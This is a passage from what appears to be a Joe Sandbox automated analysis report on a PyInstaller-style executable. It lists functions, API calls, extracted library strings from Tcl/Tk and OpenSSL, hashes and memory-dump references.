                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 190572456-3427451314
                                                              • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction ID: 2ea597ca4e0d9f415ebdc688b2cc56dbad77a80652fe467aaab850adfbfd1a4a
                                                              • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction Fuzzy Hash: 20E17268E1AB4395FB55DB14AAA41B863A5AF1C7D4F946436C83EC26F4FF3CB5488300
                                                              Function 00007FFDFB1B40C0 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4111
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4128
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B413F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4172
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B41BB
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B41EF
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4241
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4254
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B426B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B427E
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4295
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42A8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42BF
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42D2
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42E5
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42F8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B430B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4357
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4382
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-1119032718
                                                              • Opcode ID: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                              • Instruction ID: fc4c09058e97c27e1c3d6ce117edf08e9b8743f2aeb64cdb497e03515433fe70
                                                              • Opcode Fuzzy Hash: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                              • Instruction Fuzzy Hash: A191F113F0E64384FF5197259970A7826D1EF56BC8F48D130D97E866FEEE1CE6248A00
                                                              Function 00007FFDFB001C1C Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                              • API String ID: 2248877218-3630080479
                                                              • Opcode ID: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                              • Instruction ID: f7442fa3c227295fc19e7eadf1e6100d3195faed91a0009d77d22f7ad44b612a
                                                              • Opcode Fuzzy Hash: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                              • Instruction Fuzzy Hash: CFC17E21B1E64781EB14EB11A861EB96391AF467C8F488031E96D477FEDF3CE505EB40
                                                              Function 00007FF6FB1E15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2030045667-1550345328
                                                              • Opcode ID: bfc136c924c464ef2621553932b0a9cd8dc9cfe98ff03daf035e503e87b3996c
                                                              • Instruction ID: f344059fb2ec416c9533b84e2c64572820f65bd2df5aa9520ed281a62e0ad389
                                                              • Opcode Fuzzy Hash: bfc136c924c464ef2621553932b0a9cd8dc9cfe98ff03daf035e503e87b3996c
                                                              • Instruction Fuzzy Hash: EC515565E0864392EB20DB25A9605BD22A0BF4DB98F444131EE2EC7AF5FF6CF5648740
                                                              Function 00007FF6FB1E77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6FB1E7C97,?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E782C
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                              • Instruction ID: 2a2c100b0747b2f2dabfa6ddf9d6b2e70d0fd2179999a184dedd6c9b8e97e886
                                                              • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                              • Instruction Fuzzy Hash: 33416F11F2964381FB60EB24E9616BE6251AF9C7C8F545031DA6EC2AF9FE6CF108C740
                                                              Function 00007FFDFB004E3F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                              • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1270133462-2963566556
                                                              • Opcode ID: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                              • Instruction ID: 0d1ea05057f81401bfa15a94c505267589af4423a5f6aabf2c91f99a78ded360
                                                              • Opcode Fuzzy Hash: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                              • Instruction Fuzzy Hash: 9A91D473F09B8786EB209F25D8605A937A0FB457D8F444235EAAD07AE9EF38D255C300
                                                              Function 00007FFDFB39DB10 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                              • API String ID: 4069847057-2661540032
                                                              • Opcode ID: 73a2b98f0341162a4e3f0692160103fb4748255efad1c5f3900bd53c3e4ab39e
                                                              • Instruction ID: c8e8e44005d181a017e4bb9a5558a58b68d82c1d02f6d671eaeead4c6e8fa171
                                                              • Opcode Fuzzy Hash: 73a2b98f0341162a4e3f0692160103fb4748255efad1c5f3900bd53c3e4ab39e
                                                              • Instruction Fuzzy Hash: 9E419072B4AA47ABE714AB14D861B7877E1EB48B48F004035DA2D877F8DF6CE550CB40
                                                              Function 00007FFDFB0032AB Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007$A1370$B5630
                                                              • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                              • API String ID: 751195488-1596076588
                                                              • Opcode ID: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                              • Instruction ID: 038ae38c37a9f48ed18c555615140fb83476b08cc58254cc207abe62a8eb5b44
                                                              • Opcode Fuzzy Hash: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                              • Instruction Fuzzy Hash: C651B062F1A68786EB04AB269830AB937A0BF45B88F440135ED6E437FDDF3CE505D200
                                                              Function 00007FF6FB1E20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                              • Instruction ID: 3dc3369830e126535fdb4c2228ed0b968f663e87a8ca85238e0f76eaa7092272
                                                              • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                              • Instruction Fuzzy Hash: 5C51E7266147A286D7349F22B4681BEB7A1F798BA5F004121EBDF83794EF3CD145CB10
                                                              Function 00007FFDFAEE27B0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 349153199-0
                                                              • Opcode ID: 3e50bca76b458b5b335c38d1977d3d2f200015baaf06637f67122f405ac3e86f
                                                              • Instruction ID: 4ceabc019f29a6f1169d5f8dc23aee173c3ffd6a3f6a44ce20c7a5f7215bccb9
                                                              • Opcode Fuzzy Hash: 3e50bca76b458b5b335c38d1977d3d2f200015baaf06637f67122f405ac3e86f
                                                              • Instruction Fuzzy Hash: DC818F21F0824346FF6CBF6598E1A796290AF85780F5641B5ED6E473DEEE2EEC418700
